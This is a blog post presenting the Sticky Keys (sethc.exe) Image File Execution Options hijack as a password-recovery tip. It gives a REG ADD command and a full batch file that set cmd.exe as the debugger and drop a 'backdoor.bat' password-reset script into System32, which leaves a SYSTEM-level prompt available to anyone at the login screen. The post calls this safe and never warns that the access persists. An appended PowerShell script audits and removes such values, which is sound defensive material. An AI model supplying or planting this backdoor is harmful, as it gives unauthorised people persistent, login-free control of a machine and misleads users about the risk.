Wednesday, June 13, 2012

Creating a backdoor at the Windows login screen to reset a lost password.

Over the years many people have asked me how to get back into their computer after forgetting their password. There are a few ways to do this with a bootable CD or USB stick running a third-party application, but to be honest this is very unsafe: anyone who gets hold of the CD can break into the computer, and you or anyone else using such software can cause users or admins to lose data.

The only really safe way to do it is through the command prompt, but without knowing the password you cannot get into a profile to open the console, so you are stuck. Recently I discovered a way to open the command prompt from the Windows login screen by adding one value to the registry. You could put this in a registry file (.reg), but today we will just add it via the command prompt:

1. You must open cmd (the command prompt) as administrator, so you can't open it from Run. Go to your Start screen, type "cmd" in the search bar, and when it appears right-click it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select all then copy and paste into your command prompt and hit "ENTER".

You now have access to the command prompt at the Windows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row.

If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password your new password.

net user bob apples
Would change user bob's password to apples etc...

If your username has a space in it you must wrap it in quotation marks, because the space would otherwise be treated as a separator between arguments. Enter it like:

net user "bob for" apples

4. Login with your new password!

I have created a batch file to automate this process so you don't have to do half of this. You can either download it Here or if you are scared of downloading files you can just copy and paste the text below into a batch you create.

  • Right click on your desktop and select New>TXT File.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension, go into Folder Options and uncheck "Hide extensions of known applications" or something like that).
  • Once it is a .bat file, right-click it, select "Edit", paste the code below into it and save the file.
  • Right click on the bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
echo Creating backdoor console...
rem /f overwrites an existing Debugger value instead of stopping on a Yes/No prompt
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
rem Pause for roughly three seconds (ping needs a host, or it prints usage and returns at once)
PING -n 4 127.0.0.1 > NUL
echo Creating backdoor batch file...
rem %%name%% is written into the file as %name%, so it expands when backdoor.bat runs, not now
echo @echo off > C:\Windows\System32\backdoor.bat
echo title Create New User Password >> C:\Windows\System32\backdoor.bat
echo echo Enter username to reset your password: >> C:\Windows\System32\backdoor.bat
echo set name= >> C:\Windows\System32\backdoor.bat
echo set pass= >> C:\Windows\System32\backdoor.bat
echo set /P name="Username:" >> C:\Windows\System32\backdoor.bat
echo set /P pass="New Password:" >> C:\Windows\System32\backdoor.bat
echo net user %%name%% %%pass%% >> C:\Windows\System32\backdoor.bat
rem ^> escapes the redirect so "> NUL" lands in the file instead of being applied here
echo PING -n 4 127.0.0.1 ^> NUL >> C:\Windows\System32\backdoor.bat
echo exit >> C:\Windows\System32\backdoor.bat
PING -n 4 127.0.0.1 > NUL
echo To run:
echo At the login screen either press
echo shift+alt+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" to open
echo the new password screen and follow
echo the instructions.
PING -n 4 127.0.0.1 > NUL

Once it starts it will add the registry entry shown above, giving you the command prompt at the Windows login screen, and it will also create a batch file called "backdoor.bat" in your System32 folder that walks you through changing your password, so there is no need to type the commands yourself.

  • Run this batch file from the command prompt by typing "backdoor" or "backdoor.bat" and hitting "Enter".
  • It will guide you through changing your password in just a couple of steps.
Again, login and enjoy!!!
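The Debugger value this post writes under Image File Execution Options stays in the registry after the password is reset, and the login screen will keep launching cmd.exe as SYSTEM for anyone who presses the shortcut. The PowerShell script below is an added example, not part of the original post or its batch file: it audits the IFEO key for a Debugger value on sethc.exe and, going a little beyond the post, on the other accessibility helpers the login screen can launch, and removes the value when run with -Remove. The list of binaries, the -Remove switch and the output format are this example's own choices; run it from an elevated prompt.

```powershell
# Added example (not from the original post): audit Image File Execution Options
# for a "Debugger" value on accessibility binaries and optionally remove it.
# Usage:  .\Check-IfeoDebugger.ps1            (report only)
#         .\Check-IfeoDebugger.ps1 -Remove    (report and delete the values)
param(
    [switch]$Remove
)

$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Accessibility helpers the login screen launches as SYSTEM before anyone logs in.
# sethc.exe is the one the post configures; the rest are this example's assumption
# of the binaries worth checking alongside it.
$accessibilityBinaries = @(
    'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
    'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
)

$findings = foreach ($exe in $accessibilityBinaries) {
    $keyPath = Join-Path $ifeo $exe
    if (-not (Test-Path $keyPath)) { continue }

    # A missing Debugger value is normal; only a populated one is worth reporting.
    $debugger = (Get-ItemProperty -Path $keyPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ([string]::IsNullOrWhiteSpace($debugger)) { continue }

    [pscustomobject]@{
        Binary   = $exe
        Debugger = $debugger
        KeyPath  = $keyPath
    }
}

if (-not $findings) {
    Write-Output 'No IFEO Debugger values set on accessibility binaries.'
    return
}

$findings | Format-Table -AutoSize

if ($Remove) {
    foreach ($f in $findings) {
        # Delete only the Debugger value; any other settings under the key stay.
        Remove-ItemProperty -Path $f.KeyPath -Name Debugger
        Write-Output "Removed Debugger value from $($f.KeyPath)"
    }
}
```

Without -Remove the script only reports, which is the mode to use when you want to know whether a machine still carries the entry from this post. The cmd.exe equivalent of the cleanup for the key the post creates is REG DELETE with the same key path, /v Debugger and /f.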